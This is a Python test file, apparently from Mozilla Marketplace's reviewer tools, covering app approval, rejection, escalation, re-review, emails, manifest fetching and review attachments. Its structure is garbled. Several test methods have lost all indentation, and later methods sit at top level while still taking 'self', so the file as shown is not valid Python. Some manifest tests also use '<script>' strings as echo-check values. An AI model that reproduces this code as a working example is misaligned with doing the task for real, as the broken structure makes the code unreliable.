        data = {'action': 'public', 'comments': 'something'}
        data.update(self._attachment_management_form(num=0))
        self.post(data)
        eq_(self.get_app().status, amo.STATUS_PUBLIC)
        eq_(sign_mock.call_count, 1)
        eq_(update_name.call_count, 1)
        eq_(update_locales.call_count, 1)
        eq_(update_cached_manifests.delay.call_count, 1)
        eq_(storefront_mock.call_count, 1)
        # Signing is invoked with the current version's pk.
        eq_(sign_mock.call_args[0][0], self.get_app().current_version.pk)
    @mock.patch('lib.crypto.packaged.sign')
    def test_require_sig_for_public(self, sign):
        """If signing fails, a packaged app cannot go public and stays
        pending."""
        sign.side_effect = packaged.SigningError
        self.get_app().update(is_packaged=True)
        data = {'action': 'public', 'comments': 'something'}
        data.update(self._attachment_management_form(num=0))
        self.client.post(self.url, data)
        eq_(self.get_app().status, amo.STATUS_PENDING)
    @mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data')
    def test_pending_to_public_no_mozilla_contact(self, storefront_mock):
        """Approval works without a mozilla_contact; the notification just
        has no CC."""
        self.app.update(mozilla_contact='')
        data = {'action': 'public', 'device_types': '', 'browsers': '',
                'comments': 'something'}
        data.update(self._attachment_management_form(num=0))
        self.post(data)
        app = self.get_app()
        eq_(app.status, amo.STATUS_PUBLIC)
        eq_(app.current_version.files.all()[0].status, amo.STATUS_PUBLIC)
        self._check_log(amo.LOG.APPROVE_VERSION)
        eq_(len(mail.outbox), 1)
        msg = mail.outbox[0]
        self._check_email(msg, 'App approved', with_mozilla_contact=False)
        self._check_email_body(msg)
        self._check_score(amo.REVIEWED_WEBAPP_HOSTED)
        assert storefront_mock.called
    @mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data')
    @mock.patch('mkt.webapps.tasks.index_webapps')
    @mock.patch('mkt.webapps.tasks.update_cached_manifests')
    @mock.patch('mkt.webapps.models.Webapp.update_supported_locales')
    @mock.patch('mkt.webapps.models.Webapp.update_name_from_package_manifest')
    def test_pending_to_public_waiting(self, update_name, update_locales,
                                       update_cached_manifests, index_webapps,
                                       storefront_mock):
        """An app set to PUBLIC_WAIT is approved into the public-waiting
        state: reindexed, but no name/locale/manifest/storefront updates
        until it actually goes public."""
        self.get_app().update(_signal=False, make_public=amo.PUBLIC_WAIT)
        eq_(update_name.call_count, 0)
        eq_(update_locales.call_count, 0)
        eq_(index_webapps.delay.call_count, 0)
        eq_(update_cached_manifests.delay.call_count, 0)
        data = {'action': 'public', 'device_types': '', 'browsers': '',
                'comments': 'something'}
        data.update(self._attachment_management_form(num=0))
        self.post(data)
        app = self.get_app()
        eq_(app.status, amo.STATUS_PUBLIC_WAITING)
        eq_(app._current_version.files.all()[0].status,
            amo.STATUS_PUBLIC_WAITING)
        self._check_log(amo.LOG.APPROVE_VERSION_WAITING)
        eq_(len(mail.outbox), 1)
        msg = mail.outbox[0]
        self._check_email(msg, 'App approved but waiting')
        self._check_email_body(msg)
        self._check_score(amo.REVIEWED_WEBAPP_HOSTED)
        # The app is not public yet, so we shouldn't call those:
        eq_(update_name.call_count, 0)
        eq_(update_locales.call_count, 0)
        eq_(update_cached_manifests.delay.call_count, 0)
        eq_(storefront_mock.call_count, 0)
        # Indexing should still happen:
        eq_(index_webapps.delay.call_count, 1)
    @mock.patch('lib.crypto.packaged.sign')
    def test_public_waiting_signs(self, sign):
        """Packaged apps are signed even when approval only lands them in
        public-waiting."""
        self.get_app().update(is_packaged=True, make_public=amo.PUBLIC_WAIT)
        data = {'action': 'public', 'comments': 'something'}
        data.update(self._attachment_management_form(num=0))
        self.post(data)
        eq_(self.get_app().status, amo.STATUS_PUBLIC_WAITING)
        eq_(sign.call_args[0][0], self.get_app().current_version.pk)
    def test_pending_to_reject(self):
        """Rejecting a pending app disables its files, logs the rejection,
        emails the developer and awards reviewer points."""
        files = list(self.version.files.values_list('id', flat=True))
        data = {'action': 'reject', 'comments': 'suxor'}
        data.update(self._attachment_management_form(num=0))
        self.post(data)
        app = self.get_app()
        eq_(app.status, amo.STATUS_REJECTED)
        eq_(File.objects.filter(id__in=files)[0].status, amo.STATUS_DISABLED)
        self._check_log(amo.LOG.REJECT_VERSION)
        eq_(len(mail.outbox), 1)
        msg = mail.outbox[0]
        self._check_email(msg, 'Your submission has been rejected')
        self._check_email_body(msg)
        self._check_score(amo.REVIEWED_WEBAPP_HOSTED)
    @mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data')
    @mock.patch('mkt.webapps.tasks.index_webapps')
    @mock.patch('mkt.webapps.tasks.update_cached_manifests')
    @mock.patch('mkt.webapps.models.Webapp.update_supported_locales')
    @mock.patch('mkt.webapps.models.Webapp.update_name_from_package_manifest')
    @mock.patch('lib.crypto.packaged.sign_app')
    def test_packaged_multiple_versions_approve(self, sign_app_mock,
            update_name, update_locales, update_cached_manifests,
            index_webapps, storefront_mock):
        """Approving a pending update of an already-public packaged app
        publishes the new version (signed, reviewed timestamp set) and
        scores it as an update review."""
        self.app.update(status=amo.STATUS_PUBLIC, is_packaged=True)
        self.app.latest_version.files.update(status=amo.STATUS_PUBLIC)
        new_version = version_factory(addon=self.app,
                                      file_kw={'status': amo.STATUS_PENDING})
        index_webapps.delay.reset_mock()
        eq_(sign_app_mock.call_count, 0)
        eq_(update_name.call_count, 0)
        eq_(update_locales.call_count, 0)
        eq_(update_cached_manifests.delay.call_count, 0)
        eq_(storefront_mock.call_count, 0)
        data = {'action': 'public', 'device_types': '', 'browsers': '',
                'comments': 'something'}
        data.update(self._attachment_management_form(num=0))
        self.post(data)
        app = self.get_app()
        new_version.reload()
        eq_(app.status, amo.STATUS_PUBLIC)
        self.assertCloseToNow(new_version.reviewed)
        eq_(new_version.files.all()[0].status, amo.STATUS_PUBLIC)
        self._check_log(amo.LOG.APPROVE_VERSION)
        eq_(len(mail.outbox), 1)
        msg = mail.outbox[0]
        self._check_email(msg, 'App approved')
        self._check_email_body(msg)
        self._check_score(amo.REVIEWED_WEBAPP_UPDATE)
        eq_(sign_app_mock.call_count, 1)
        eq_(update_name.call_count, 1)
        eq_(update_locales.call_count, 1)
        eq_(index_webapps.delay.call_count, 1)
        eq_(update_cached_manifests.delay.call_count, 1)
        eq_(storefront_mock.call_count, 1)
def test_packaged_multiple_versions_reject(self):
self.app.update(status=amo.STATUS_PUBLIC, is_packaged=True)
self.app.current_version.files.update(status=amo.STATUS_PUBLIC)
new_version = version_factory(addon=self.app)
new_version.files.all().update(status=amo.STATUS_PENDING)
data = {'action': 'reject', 'device_types': '', 'browsers': '',
'comments': 'something'}
data.update(self._attachment_management_form(num=0))
self.post(data)
app = self.get_app()
eq_(app.status, amo.STATUS_PUBLIC)
eq_(new_version.reviewed, None)
eq_(new_version.files.all()[0].status, amo.STATUS_DISABLED)
self._check_log(amo.LOG.REJECT_VERSION)
eq_(len(mail.outbox), 1)
msg = mail.outbox[0]
self._check_email(msg, 'Your submission has been rejected')
self._check_email_body(msg)
self._check_score(amo.REVIEWED_WEBAPP_UPDATE)
    @mock.patch('mkt.reviewers.views.messages.success')
    def test_pending_to_escalation(self, messages):
        """Escalating queues the app and emails both developer and admins."""
        data = {'action': 'escalate', 'comments': 'soup her man'}
        data.update(self._attachment_management_form(num=0))
        self.post(data)
        eq_(EscalationQueue.objects.count(), 1)
        self._check_log(amo.LOG.ESCALATE_MANUAL)
        # Test 2 emails: 1 to dev, 1 to admin.
        eq_(len(mail.outbox), 2)
        dev_msg = mail.outbox[0]
        self._check_email(dev_msg, 'Submission Update')
        adm_msg = mail.outbox[1]
        self._check_admin_email(adm_msg, 'Escalated Review Requested')
        eq_(messages.call_args_list[0][0][1], 'Review successfully processed.')
    def test_pending_to_disable_senior_reviewer(self):
        """Senior reviewers can disable a public app, disabling its files
        and emailing the developer."""
        self.login_as_senior_reviewer()
        self.app.update(status=amo.STATUS_PUBLIC)
        self.app.current_version.files.update(status=amo.STATUS_PUBLIC)
        data = {'action': 'disable', 'comments': 'disabled ur app'}
        data.update(self._attachment_management_form(num=0))
        self.post(data)
        app = self.get_app()
        eq_(app.status, amo.STATUS_DISABLED)
        eq_(app.latest_version.files.all()[0].status, amo.STATUS_DISABLED)
        self._check_log(amo.LOG.APP_DISABLED)
        eq_(len(mail.outbox), 1)
        self._check_email(mail.outbox[0], 'App disabled by reviewer')
    def test_pending_to_disable(self):
        """Regular reviewers may not disable: the form rejects the action
        and the app stays public with no email sent."""
        self.app.update(status=amo.STATUS_PUBLIC)
        self.app.current_version.files.update(status=amo.STATUS_PUBLIC)
        data = {'action': 'disable', 'comments': 'disabled ur app'}
        data.update(self._attachment_management_form(num=0))
        res = self.client.post(self.url, data)
        eq_(res.status_code, 200)
        ok_('action' in res.context['form'].errors)
        eq_(self.get_app().status, amo.STATUS_PUBLIC)
        eq_(len(mail.outbox), 0)
    @mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data')
    def test_escalation_to_public(self, storefront_mock):
        """Approving from the escalated queue publishes the app and clears
        its escalation entry."""
        EscalationQueue.objects.create(addon=self.app)
        eq_(self.app.status, amo.STATUS_PENDING)
        data = {'action': 'public', 'device_types': '', 'browsers': '',
                'comments': 'something'}
        data.update(self._attachment_management_form(num=0))
        self.post(data, queue='escalated')
        app = self.get_app()
        eq_(app.status, amo.STATUS_PUBLIC)
        eq_(app.current_version.files.all()[0].status, amo.STATUS_PUBLIC)
        self._check_log(amo.LOG.APPROVE_VERSION)
        eq_(EscalationQueue.objects.count(), 0)
        eq_(len(mail.outbox), 1)
        msg = mail.outbox[0]
        self._check_email(msg, 'App approved')
        self._check_email_body(msg)
        assert storefront_mock.called
    def test_escalation_to_reject(self):
        """Rejecting from the escalated queue disables files and clears the
        escalation entry."""
        EscalationQueue.objects.create(addon=self.app)
        eq_(self.app.status, amo.STATUS_PENDING)
        files = list(self.version.files.values_list('id', flat=True))
        data = {'action': 'reject', 'device_types': '', 'browsers': '',
                'comments': 'something'}
        data.update(self._attachment_management_form(num=0))
        self.post(data, queue='escalated')
        app = self.get_app()
        eq_(app.status, amo.STATUS_REJECTED)
        eq_(File.objects.filter(id__in=files)[0].status, amo.STATUS_DISABLED)
        self._check_log(amo.LOG.REJECT_VERSION)
        eq_(EscalationQueue.objects.count(), 0)
        eq_(len(mail.outbox), 1)
        msg = mail.outbox[0]
        self._check_email(msg, 'Your submission has been rejected')
        self._check_email_body(msg)
        self._check_score(amo.REVIEWED_WEBAPP_HOSTED)
    def test_escalation_to_disable_senior_reviewer(self):
        """Senior reviewers can disable an escalated public app; the
        escalation entry is cleared."""
        self.login_as_senior_reviewer()
        EscalationQueue.objects.create(addon=self.app)
        self.app.update(status=amo.STATUS_PUBLIC)
        self.app.latest_version.files.update(status=amo.STATUS_PUBLIC)
        data = {'action': 'disable', 'comments': 'disabled ur app'}
        data.update(self._attachment_management_form(num=0))
        self.post(data, queue='escalated')
        app = self.get_app()
        eq_(app.status, amo.STATUS_DISABLED)
        eq_(app.latest_version.files.all()[0].status, amo.STATUS_DISABLED)
        self._check_log(amo.LOG.APP_DISABLED)
        eq_(EscalationQueue.objects.count(), 0)
        eq_(len(mail.outbox), 1)
        self._check_email(mail.outbox[0], 'App disabled by reviewer')
def test_escalation_to_disable(self):
EscalationQueue.objects.create(addon=self.app)
self.app.update(status=amo.STATUS_PUBLIC)
self.app.latest_version.files.update(status=amo.STATUS_PUBLIC)
data = {'action': 'disable', 'comments': 'disabled ur app'}
data.update(self._attachment_management_form(num=0))
res = self.client.post(self.url, data, queue='escalated')
eq_(res.status_code, 200)
ok_('action' in res.context['form'].errors)
eq_(self.get_app().status, amo.STATUS_PUBLIC)
eq_(EscalationQueue.objects.count(), 1)
eq_(len(mail.outbox), 0)
    def test_clear_escalation(self):
        """Clearing an escalation removes the queue entry, logs it, and
        sends no email."""
        self.app.update(status=amo.STATUS_PUBLIC)
        self.app.latest_version.files.update(status=amo.STATUS_PUBLIC)
        EscalationQueue.objects.create(addon=self.app)
        data = {'action': 'clear_escalation', 'comments': 'all clear'}
        data.update(self._attachment_management_form(num=0))
        self.post(data, queue='escalated')
        eq_(EscalationQueue.objects.count(), 0)
        self._check_log(amo.LOG.ESCALATION_CLEARED)
        # Ensure we don't send email on clearing escalations.
        eq_(len(mail.outbox), 0)
    def test_rereview_to_reject(self):
        """Rejecting from the re-review queue rejects the app, clears the
        queue entry, and scores as a re-review."""
        RereviewQueue.objects.create(addon=self.app)
        self.app.update(status=amo.STATUS_PUBLIC)
        self.app.latest_version.files.update(status=amo.STATUS_PUBLIC)
        data = {'action': 'reject', 'device_types': '', 'browsers': '',
                'comments': 'something'}
        data.update(self._attachment_management_form(num=0))
        self.post(data, queue='rereview')
        eq_(self.get_app().status, amo.STATUS_REJECTED)
        self._check_log(amo.LOG.REJECT_VERSION)
        eq_(RereviewQueue.objects.count(), 0)
        eq_(len(mail.outbox), 1)
        msg = mail.outbox[0]
        self._check_email(msg, 'Your submission has been rejected')
        self._check_email_body(msg)
        self._check_score(amo.REVIEWED_WEBAPP_REREVIEW)
    def test_rereview_to_disable_senior_reviewer(self):
        """Senior reviewers can disable an app from the re-review queue; the
        queue entry is cleared."""
        self.login_as_senior_reviewer()
        RereviewQueue.objects.create(addon=self.app)
        self.app.update(status=amo.STATUS_PUBLIC)
        self.app.latest_version.files.update(status=amo.STATUS_PUBLIC)
        data = {'action': 'disable', 'device_types': '', 'browsers': '',
                'comments': 'something'}
        data.update(self._attachment_management_form(num=0))
        self.post(data, queue='rereview')
        eq_(self.get_app().status, amo.STATUS_DISABLED)
        self._check_log(amo.LOG.APP_DISABLED)
        eq_(RereviewQueue.objects.filter(addon=self.app).count(), 0)
        eq_(len(mail.outbox), 1)
        self._check_email(mail.outbox[0], 'App disabled by reviewer')
def test_rereview_to_disable(self):
RereviewQueue.objects.create(addon=self.app)
self.app.update(status=amo.STATUS_PUBLIC)
self.app.latest_version.files.update(status=amo.STATUS_PUBLIC)
data = {'action': 'disable', 'comments': 'disabled ur app'}
data.update(self._attachment_management_form(num=0))
res = self.client.post(self.url, data, queue='rereview')
eq_(res.status_code, 200)
ok_('action' in res.context['form'].errors)
eq_(self.get_app().status, amo.STATUS_PUBLIC)
eq_(RereviewQueue.objects.filter(addon=self.app).count(), 1)
eq_(len(mail.outbox), 0)
    def test_clear_rereview(self):
        """Clearing a re-review removes the queue entry, logs it, sends no
        email, and still awards re-review points."""
        self.app.update(status=amo.STATUS_PUBLIC)
        self.app.latest_version.files.update(status=amo.STATUS_PUBLIC)
        RereviewQueue.objects.create(addon=self.app)
        data = {'action': 'clear_rereview', 'comments': 'all clear'}
        data.update(self._attachment_management_form(num=0))
        self.post(data, queue='rereview')
        eq_(RereviewQueue.objects.count(), 0)
        self._check_log(amo.LOG.REREVIEW_CLEARED)
        # Ensure we don't send email on clearing re-reviews.
        eq_(len(mail.outbox), 0)
        self._check_score(amo.REVIEWED_WEBAPP_REREVIEW)
    def test_rereview_to_escalation(self):
        """Escalating from re-review queues an escalation and emails both
        developer and admins."""
        RereviewQueue.objects.create(addon=self.app)
        data = {'action': 'escalate', 'comments': 'soup her man'}
        data.update(self._attachment_management_form(num=0))
        self.post(data, queue='rereview')
        eq_(EscalationQueue.objects.count(), 1)
        self._check_log(amo.LOG.ESCALATE_MANUAL)
        # Test 2 emails: 1 to dev, 1 to admin.
        eq_(len(mail.outbox), 2)
        dev_msg = mail.outbox[0]
        self._check_email(dev_msg, 'Submission Update')
        adm_msg = mail.outbox[1]
        self._check_admin_email(adm_msg, 'Escalated Review Requested')
    def test_more_information(self):
        """Requesting more info keeps the app pending, flags the version
        with has_info_request, and emails the developer."""
        # Test the same for all queues.
        data = {'action': 'info', 'comments': 'Knead moor in faux'}
        data.update(self._attachment_management_form(num=0))
        self.post(data)
        eq_(self.get_app().status, amo.STATUS_PENDING)
        self._check_log(amo.LOG.REQUEST_INFORMATION)
        vqs = self.get_app().versions.all()
        eq_(vqs.count(), 1)
        eq_(vqs.filter(has_info_request=True).count(), 1)
        eq_(len(mail.outbox), 1)
        msg = mail.outbox[0]
        self._check_email(msg, 'More information needed to review')
    def test_multi_cc_email(self):
        """Multiple (non-ASCII) mozilla_contact addresses are all CC'd."""
        # Test multiple mozilla_contact emails via more information.
        contacts = [u'á@b.com', u'ç@d.com']
        self.mozilla_contact = ', '.join(contacts)
        self.app.update(mozilla_contact=self.mozilla_contact)
        data = {'action': 'info', 'comments': 'Knead moor in faux'}
        data.update(self._attachment_management_form(num=0))
        self.post(data)
        eq_(len(mail.outbox), 1)
        msg = mail.outbox[0]
        self._check_email(msg, 'More information needed to review')
    def test_comment(self):
        """A private comment logs the action but sends no email."""
        # Test the same for all queues.
        data = {'action': 'comment', 'comments': 'mmm, nice app'}
        data.update(self._attachment_management_form(num=0))
        self.post(data)
        eq_(len(mail.outbox), 0)
        self._check_log(amo.LOG.COMMENT_VERSION)
    def test_receipt_no_node(self):
        """Free apps render no receipt-check widget."""
        res = self.client.get(self.url)
        eq_(len(pq(res.content)('#receipt-check-result')), 0)
    def test_receipt_has_node(self):
        """Premium apps render the receipt-check widget in both the desktop
        and mobile reviewer layouts."""
        self.get_app().update(premium_type=amo.ADDON_PREMIUM)
        res = self.client.get(self.url)
        eq_(len(pq(res.content)('.reviewers-desktop #receipt-check-result')),
            1)
        eq_(len(pq(res.content)('.reviewers-mobile #receipt-check-result')),
            1)
    @mock.patch('mkt.reviewers.views.requests.get')
    def test_manifest_json(self, mock_get):
        """The manifest endpoint echoes fetched content and content-type
        verbatim (including markup, which the client is expected to
        escape)."""
        m = mock.Mock()
        m.content = 'the manifest contents <script>'
        m.headers = CaseInsensitiveDict({'content-type':
            'application/x-web-app-manifest+json <script>'})
        mock_get.return_value = m
        expected = {
            'content': 'the manifest contents <script>',
            'headers': {'content-type':
                        'application/x-web-app-manifest+json <script>'},
            'success': True,
            'permissions': {}
        }
        r = self.client.get(reverse('reviewers.apps.review.manifest',
                                    args=[self.app.app_slug]))
        eq_(r.status_code, 200)
        eq_(json.loads(r.content), expected)
    @mock.patch('mkt.reviewers.views.requests.get')
    def test_manifest_json_unicode(self, mock_get):
        """Non-ASCII manifest content survives the round trip intact."""
        m = mock.Mock()
        m.content = u'كك some foreign ish'
        m.headers = CaseInsensitiveDict({})
        mock_get.return_value = m
        r = self.client.get(reverse('reviewers.apps.review.manifest',
                                    args=[self.app.app_slug]))
        eq_(r.status_code, 200)
        eq_(json.loads(r.content), {'content': u'كك some foreign ish',
                                    'headers': {}, 'success': True,
                                    'permissions': {}})
    @mock.patch('mkt.reviewers.views.requests.get')
    def test_manifest_json_encoding(self, mock_get):
        """A non-UTF-8 manifest is decoded correctly before being echoed."""
        m = mock.Mock()
        with storage.open(self.manifest_path('non-utf8.webapp')) as fp:
            m.content = fp.read()
        m.headers = CaseInsensitiveDict({})
        mock_get.return_value = m
        r = self.client.get(reverse('reviewers.apps.review.manifest',
                                    args=[self.app.app_slug]))
        eq_(r.status_code, 200)
        data = json.loads(r.content)
        assert u'"name": "W2MO\u017d"' in data['content']
    @mock.patch('mkt.reviewers.views.requests.get')
    def test_manifest_json_encoding_empty(self, mock_get):
        """An empty manifest body is handled gracefully."""
        m = mock.Mock()
        m.content = ''
        m.headers = CaseInsensitiveDict({})
        mock_get.return_value = m
        r = self.client.get(reverse('reviewers.apps.review.manifest',
                                    args=[self.app.app_slug]))
        eq_(r.status_code, 200)
        eq_(json.loads(r.content), {'content': u'', 'headers': {},
                                    'success': True, 'permissions': {}})
    @mock.patch('mkt.reviewers.views.requests.get')
    def test_manifest_json_traceback_in_response(self, mock_get):
        """A fetch error (SSLError) yields a 200 whose content carries the
        traceback, rather than a 500."""
        m = mock.Mock()
        m.content = {'name': 'Some name'}
        m.headers = CaseInsensitiveDict({})
        mock_get.side_effect = requests.exceptions.SSLError
        mock_get.return_value = m
        # We should not 500 on a traceback.
        r = self.client.get(reverse('reviewers.apps.review.manifest',
                                    args=[self.app.app_slug]))
        eq_(r.status_code, 200)
        data = json.loads(r.content)
        assert data['content'], 'There should be a content with the traceback'
        eq_(data['headers'], {})
    @mock.patch('mkt.reviewers.views.json.dumps')
    def test_manifest_json_packaged(self, mock_):
        """Packaged apps serve a locally-built mini-manifest (json.dumps is
        hit) instead of fetching a remote one."""
        # Test that when the app is packaged, _mini_manifest is called.
        mock_.return_value = '{}'
        self.get_app().update(is_packaged=True)
        res = self.client.get(reverse('reviewers.apps.review.manifest',
                                      args=[self.app.app_slug]))
        eq_(res.status_code, 200)
        assert mock_.called
    @mock.patch('mkt.reviewers.views._get_manifest_json')
    def test_manifest_json_perms(self, mock_):
        """Manifest permissions are annotated with their permission type
        (e.g. 'web' vs 'cert') in the response."""
        mock_.return_value = {
            'permissions': {
                "foo": {"description": "foo"},
                "camera": {"description": "<script>"}
            }
        }
        self.get_app().update(is_packaged=True)
        r = self.client.get(reverse('reviewers.apps.review.manifest',
                                    args=[self.app.app_slug]))
        eq_(r.status_code, 200)
        eq_(json.loads(r.content)['permissions'],
            {'foo': {'description': 'foo', 'type': 'web'},
             'camera': {'description': '<script>', 'type': 'cert'}})
def test_abuse(self):
    """Abuse-report count and link show in both desktop and mobile summaries."""
    AbuseReport.objects.create(addon=self.app, message='!@#$')
    res = self.client.get(self.url)
    doc = pq(res.content)
    abuse_url = reverse('reviewers.apps.review.abuse',
                        args=[self.app.app_slug])
    # The summary block is rendered twice: once per form factor.
    for platform in ('desktop', 'mobile'):
        dd = doc('.reviewers-%s #summary dd.abuse-reports' % platform)
        eq_(dd.text(), u'1')
        eq_(dd.find('a').attr('href'), abuse_url)
def _attachment_form_data(self, num=1, action='comment'):
    """Assemble POST data for review `action` carrying `num` attachments."""
    form = dict(action=action, comments='mmm, nice app')
    form.update(self._attachment_management_form(num=num))
    form.update(self._attachments(num))
    return form
def _attachment_post(self, num):
    """
    Test that `num` attachment objects are successfully created by the
    appropriate form submission. Tests this in two ways:

    1) Ensuring that the form is submitted correctly.
    2) Checking that the appropriate number of objects are created.
    """
    old_attachment_count = ActivityLogAttachment.objects.all().count()
    self.post(self._attachment_form_data(num=num))
    new_attachment_count = ActivityLogAttachment.objects.all().count()
    # Fixed typo in the failure message ('AcitvityLog' -> 'ActivityLog').
    eq_(new_attachment_count - old_attachment_count, num,
        'ActivityLog objects not being created')
@override_settings(REVIEWER_ATTACHMENTS_PATH=ATTACHMENTS_DIR)
@mock.patch('amo.utils.LocalFileStorage.save')
def test_no_attachments(self, save_mock):
    """ Test addition of no attachment """
    self.post(self._attachment_form_data(num=0, action='public'))
    # Nothing should have been written to attachment storage.
    eq_(save_mock.called, False, save_mock.call_args_list)
@override_settings(REVIEWER_ATTACHMENTS_PATH=ATTACHMENTS_DIR)
@mock.patch('amo.utils.LocalFileStorage.save')
def test_attachment(self, save_mock):
    """ Test addition of an attachment """
    self._attachment_post(1)
    # The uploaded file is saved into the configured attachments dir.
    eq_(save_mock.call_args_list[0],
        mock.call(path.join(ATTACHMENTS_DIR, 'bacon.txt'), mock.ANY))
@override_settings(REVIEWER_ATTACHMENTS_PATH=ATTACHMENTS_DIR)
@mock.patch('amo.utils.LocalFileStorage.save')
def test_attachment_email(self, save_mock):
    """
    Test that a single attachment is included as an attachment in
    notification emails.
    """
    self.post(self._attachment_form_data(num=1, action='escalate'))
    eq_(len(mail.outbox[0].attachments), 1,
        'Review attachment not added to email')
    # Guard against empty (0-byte) attachments slipping through.
    for attachment in mail.outbox[0].attachments:
        self.assertNotEqual(len(attachment), 0, '0-length attachment')
    eq_(save_mock.call_args_list[0],
        mock.call(path.join(ATTACHMENTS_DIR, 'bacon.txt'), mock.ANY))
@override_settings(REVIEWER_ATTACHMENTS_PATH=ATTACHMENTS_DIR)
@mock.patch('amo.utils.LocalFileStorage.save')
def test_attachment_email_multiple(self, save_mock):
    """
    Test that multiple attachments are included as attachments in
    notification emails.
    """
    self.post(self._attachment_form_data(num=2, action='reject'))
    eq_(len(mail.outbox[0].attachments), 2,
        'Review attachments not added to email')
    eq_(save_mock.call_args_list[0],
        mock.call(path.join(ATTACHMENTS_DIR, 'bacon.txt'), mock.ANY))
@override_settings(REVIEWER_ATTACHMENTS_PATH=ATTACHMENTS_DIR)
@mock.patch('amo.utils.LocalFileStorage.save')
def test_attachment_email_escalate(self, save_mock):
    """
    Test that attachments are included as attachments in an `escalate`
    review, which uses a different mechanism for notification email
    sending.
    """
    self.post(self._attachment_form_data(num=1, action='escalate'))
    eq_(len(mail.outbox[0].attachments), 1,
        'Review attachment not added to email')
    eq_(save_mock.call_args_list[0],
        mock.call(path.join(ATTACHMENTS_DIR, 'bacon.txt'), mock.ANY))
@override_settings(REVIEWER_ATTACHMENTS_PATH=ATTACHMENTS_DIR)
@mock.patch('amo.utils.LocalFileStorage.save')
def test_attachment_email_requestinfo(self, save_mock):
    """
    Test that attachments are included as attachments in an `info` review,
    which uses a different mechanism for notification email sending.
    """
    self.post(self._attachment_form_data(num=1, action='info'))
    eq_(len(mail.outbox[0].attachments), 1,
        'Review attachment not added to email')
    eq_(save_mock.call_args_list[0],
        mock.call(path.join(ATTACHMENTS_DIR, 'bacon.txt'), mock.ANY))
def test_idn_app_domain(self):
    """The IDN warning appears only once the app domain is internationalized."""
    response = self.client.get(self.url)
    # Idiom fix: 'X not in Y' instead of 'not X in Y'.
    assert 'IDN domain!' not in response.content

    self.get_app().update(app_domain=u'http://www.allïzom.org')
    response = self.client.get(self.url)
    assert 'IDN domain!' in response.content
def test_priority_flag_cleared_for_public(self):
    """Approving an app clears its priority-review flag."""
    self.get_app().update(priority_review=True)
    data = {'action': 'public', 'device_types': '', 'browsers': '',
            'comments': 'something'}
    data.update(self._attachment_management_form(num=0))
    self.post(data)
    eq_(self.get_app().priority_review, False)
def test_priority_flag_uncleared_for_reject(self):
    """Rejecting an app keeps its priority-review flag set."""
    self.get_app().update(priority_review=True)
    data = {'action': 'reject', 'device_types': '', 'browsers': '',
            'comments': 'something'}
    data.update(self._attachment_management_form(num=0))
    self.post(data)
    eq_(self.get_app().priority_review, True)
def test_is_tarako_checkbox(self):
    """The tarako checkbox reflects whether the app has the 'tarako' tag."""
    res = self.client.get(self.url)
    eq_(pq(res.content)('#id_is_tarako:checked').length, 0)
    app = self.get_app()
    Tag(tag_text='tarako').save_tag(app)
    res = self.client.get(self.url)
    eq_(pq(res.content)('#id_is_tarako:checked').length, 1)
def test_is_tarako_on(self):
    """Checking the box adds the 'tarako' tag to the app."""
    # Note: Using action=comment b/c it does less and keeps test faster.
    data = {'action': 'comment', 'comments': 'blah', 'is_tarako': 'on'}
    data.update(self._attachment_management_form(num=0))
    self.post(data)
    tags = self.get_app().tags.values_list('tag_text', flat=True)
    assert 'tarako' in tags
def test_is_tarako_off(self):
    """Omitting the checkbox leaves the app without the 'tarako' tag."""
    # Note: Using action=comment b/c it does less and keeps test faster.
    # Note: `is_tarako` isn't passed b/c checkboxes.
    data = {'action': 'comment', 'comments': 'blah'}
    data.update(self._attachment_management_form(num=0))
    self.post(data)
    tags = self.get_app().tags.values_list('tag_text', flat=True)
    assert 'tarako' not in tags
class TestCannedResponses(AppReviewerTest):
    """Canned responses in the review form are filtered by type: app
    reviewers see app-type responses but not add-on-type ones."""

    def setUp(self):
        super(TestCannedResponses, self).setUp()
        self.login_as_editor()
        self.app = app_factory(name='XXX',
                               status=amo.STATUS_PENDING)
        # One canned response of each type; only the app one should show.
        self.cr_addon = CannedResponse.objects.create(
            name=u'addon reason', response=u'addon reason body',
            sort_group=u'public', type=amo.CANNED_RESPONSE_ADDON)
        self.cr_app = CannedResponse.objects.create(
            name=u'app reason', response=u'app reason body',
            sort_group=u'public', type=amo.CANNED_RESPONSE_APP)
        self.url = reverse('reviewers.apps.review', args=[self.app.app_slug])

    def test_no_addon(self):
        """The add-on canned response must not appear in the app form."""
        r = self.client.get(self.url)
        eq_(r.status_code, 200)
        form = r.context['form']
        choices = form.fields['canned_response'].choices[1][1]
        # choices is grouped by the sort_group, where choices[0] is the
        # default "Choose a response..." option.
        # Within that, it's paired by [group, [[response, name],...]].
        # So above, choices[1][1] gets the first real group's list of
        # responses.
        eq_(len(choices), 1)
        assert self.cr_app.response in choices[0]
        assert self.cr_addon.response not in choices[0]
class TestReviewLog(AppReviewerTest, AccessMixin):
    """Tests for the reviewer activity-log listing, its filters and search."""

    def setUp(self):
        self.login_as_editor()
        super(TestReviewLog, self).setUp()
        # Note: if `created` is not specified, `addon_factory`/`app_factory`
        # uses a randomly generated timestamp.
        self.apps = [app_factory(name='XXX', created=days_ago(3),
                                 status=amo.STATUS_PENDING),
                     app_factory(name='YYY', created=days_ago(2),
                                 status=amo.STATUS_PENDING)]
        self.url = reverse('reviewers.apps.logs')

        self.task_user = UserProfile.objects.get(email='[email protected]')
        # Pin TASK_USER_ID so task-generated entries can be filtered out.
        patcher = mock.patch.object(settings, 'TASK_USER_ID',
                                    self.task_user.id)
        patcher.start()
        self.addCleanup(patcher.stop)

    def get_user(self):
        """Return an arbitrary user to attribute log entries to."""
        return UserProfile.objects.all()[0]

    def make_approvals(self):
        """Log a rejection for each app, plus task-user entries that must
        not show up in the listing."""
        for app in self.apps:
            amo.log(amo.LOG.REJECT_VERSION, app, app.current_version,
                    user=self.get_user(), details={'comments': 'youwin'})
            # Throw in a few tasks logs that shouldn't get queried.
            amo.log(amo.LOG.REREVIEW_MANIFEST_CHANGE, app,
                    app.current_version, user=self.task_user,
                    details={'comments': 'foo'})

    def make_an_approval(self, action, comment='youwin', username=None,
                         app=None):
        """Log a single `action` entry, optionally for a given user/app."""
        if username:
            user = UserProfile.objects.get(username=username)
        else:
            user = self.get_user()
        if not app:
            app = self.apps[0]
        amo.log(action, app, app.current_version, user=user,
                details={'comments': comment})

    def test_basic(self):
        self.make_approvals()
        r = self.client.get(self.url)
        eq_(r.status_code, 200)
